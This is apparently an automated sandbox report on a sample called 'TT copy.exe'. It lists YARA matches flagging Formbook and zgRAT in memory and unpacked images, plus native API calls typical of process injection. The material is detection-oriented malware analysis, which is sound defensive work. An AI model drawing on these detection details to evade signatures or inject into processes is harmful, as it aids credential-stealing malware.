            Source: 00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.774935226.0000000003430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.774935226.0000000003430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.355171792.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.355171792.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.294087756.0000000007160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
            Source: 00000007.00000000.320130923.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.320130923.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000000.277077283.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000000.277077283.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000000.276708609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000000.276708609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000000.338379852.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.338379852.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.775282393.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.775282393.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.289098231.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.289098231.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: TT copy.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
            Source: 3.0.TT copy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.TT copy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.TT copy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.TT copy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.TT copy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.TT copy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.TT copy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.TT copy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.TT copy.exe.7160000.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
            Source: 3.2.TT copy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.2.TT copy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.TT copy.exe.7160000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
            Source: 0.2.TT copy.exe.3ae0848.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
            Source: 3.0.TT copy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.TT copy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.2.TT copy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.2.TT copy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.TT copy.exe.3ae0848.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
            Source: 0.2.TT copy.exe.39a9950.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
            Source: 0.2.TT copy.exe.39a9950.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.TT copy.exe.39a9950.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.774935226.0000000003430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.774935226.0000000003430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.355171792.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.355171792.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.294087756.0000000007160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
            Source: 00000007.00000000.320130923.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.320130923.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.277077283.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.277077283.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.276708609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.276708609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.338379852.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.338379852.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.775282393.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.775282393.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.289098231.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.289098231.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\TT copy.exeCode function: String function: 0106B150 appears 136 times
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 051AB150 appears 124 times
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041A320 NtCreateFile,3_2_0041A320
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041A3D0 NtReadFile,3_2_0041A3D0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041A450 NtClose,3_2_0041A450
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041A500 NtAllocateVirtualMemory,3_2_0041A500
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041A2DA NtCreateFile,3_2_0041A2DA
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041A324 NtCreateFile,3_2_0041A324
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041A44A NtClose,3_2_0041A44A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_010A9910
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A99A0 NtCreateSection,LdrInitializeThunk,3_2_010A99A0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9840 NtDelayExecution,LdrInitializeThunk,3_2_010A9840
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_010A9860
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_010A98F0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_010A9A00
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9A20 NtResumeThread,LdrInitializeThunk,3_2_010A9A20
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9A50 NtCreateFile,LdrInitializeThunk,3_2_010A9A50
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9540 NtReadFile,LdrInitializeThunk,3_2_010A9540
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A95D0 NtClose,LdrInitializeThunk,3_2_010A95D0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9710 NtQueryInformationToken,LdrInitializeThunk,3_2_010A9710
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9780 NtMapViewOfSection,LdrInitializeThunk,3_2_010A9780
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_010A97A0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9FE0 NtCreateMutant,LdrInitializeThunk,3_2_010A9FE0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_010A9660
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_010A96E0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9950 NtQueueApcThread,3_2_010A9950
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A99D0 NtCreateProcessEx,3_2_010A99D0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9820 NtEnumerateKey,3_2_010A9820
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010AB040 NtSuspendThread,3_2_010AB040
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A98A0 NtWriteVirtualMemory,3_2_010A98A0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9B00 NtSetValueKey,3_2_010A9B00
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010AA3B0 NtGetContextThread,3_2_010AA3B0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9A10 NtQuerySection,3_2_010A9A10
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9A80 NtOpenDirectoryObject,3_2_010A9A80
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9520 NtWaitForSingleObject,3_2_010A9520
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010AAD30 NtSetContextThread,3_2_010AAD30
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9560 NtWriteFile,3_2_010A9560
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A95F0 NtQueryInformationFile,3_2_010A95F0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010AA710 NtOpenProcessToken,3_2_010AA710
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9730 NtQueryVirtualMemory,3_2_010A9730
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9760 NtOpenProcess,3_2_010A9760
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9770 NtSetInformationFile,3_2_010A9770
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010AA770 NtOpenThread,3_2_010AA770
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9610 NtEnumerateValueKey,3_2_010A9610
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9650 NtQueryValueKey,3_2_010A9650
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9670 NtQueryInformationProcess,3_2_010A9670
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A96D0 NtCreateKey,3_2_010A96D0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9540 NtReadFile,LdrInitializeThunk,15_2_051E9540
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E95D0 NtClose,LdrInitializeThunk,15_2_051E95D0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9710 NtQueryInformationToken,LdrInitializeThunk,15_2_051E9710
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9780 NtMapViewOfSection,LdrInitializeThunk,15_2_051E9780
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9FE0 NtCreateMutant,LdrInitializeThunk,15_2_051E9FE0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9610 NtEnumerateValueKey,LdrInitializeThunk,15_2_051E9610
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9650 NtQueryValueKey,LdrInitializeThunk,15_2_051E9650
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9660 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_051E9660
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E96D0 NtCreateKey,LdrInitializeThunk,15_2_051E96D0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E96E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_051E96E0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_051E9910
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E99A0 NtCreateSection,LdrInitializeThunk,15_2_051E99A0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9840 NtDelayExecution,LdrInitializeThunk,15_2_051E9840
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9860 NtQuerySystemInformation,LdrInitializeThunk,15_2_051E9860
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9B00 NtSetValueKey,LdrInitializeThunk,15_2_051E9B00
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9A50 NtCreateFile,LdrInitializeThunk,15_2_051E9A50
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051EAD30 NtSetContextThread,15_2_051EAD30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9520 NtWaitForSingleObject,15_2_051E9520
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9560 NtWriteFile,15_2_051E9560
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E95F0 NtQueryInformationFile,15_2_051E95F0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051EA710 NtOpenProcessToken,15_2_051EA710
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9730 NtQueryVirtualMemory,15_2_051E9730
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051EA770 NtOpenThread,15_2_051EA770
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9770 NtSetInformationFile,15_2_051E9770
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9760 NtOpenProcess,15_2_051E9760
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E97A0 NtUnmapViewOfSection,15_2_051E97A0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9670 NtQueryInformationProcess,15_2_051E9670
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9950 NtQueueApcThread,15_2_051E9950
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E99D0 NtCreateProcessEx,15_2_051E99D0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9820 NtEnumerateKey,15_2_051E9820
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051EB040 NtSuspendThread,15_2_051EB040
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E98A0 NtWriteVirtualMemory,15_2_051E98A0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E98F0 NtReadVirtualMemory,15_2_051E98F0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051EA3B0 NtGetContextThread,15_2_051EA3B0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9A10 NtQuerySection,15_2_051E9A10
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9A00 NtProtectVirtualMemory,15_2_051E9A00
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9A20 NtResumeThread,15_2_051E9A20
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9A80 NtOpenDirectoryObject,15_2_051E9A80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4A3D0 NtReadFile,15_2_00F4A3D0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4A320 NtCreateFile,15_2_00F4A320
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4A450 NtClose,15_2_00F4A450
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4A500 NtAllocateVirtualMemory,15_2_00F4A500
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4A2DA NtCreateFile,15_2_00F4A2DA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4A324 NtCreateFile,15_2_00F4A324
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4A44A NtClose,15_2_00F4A44A
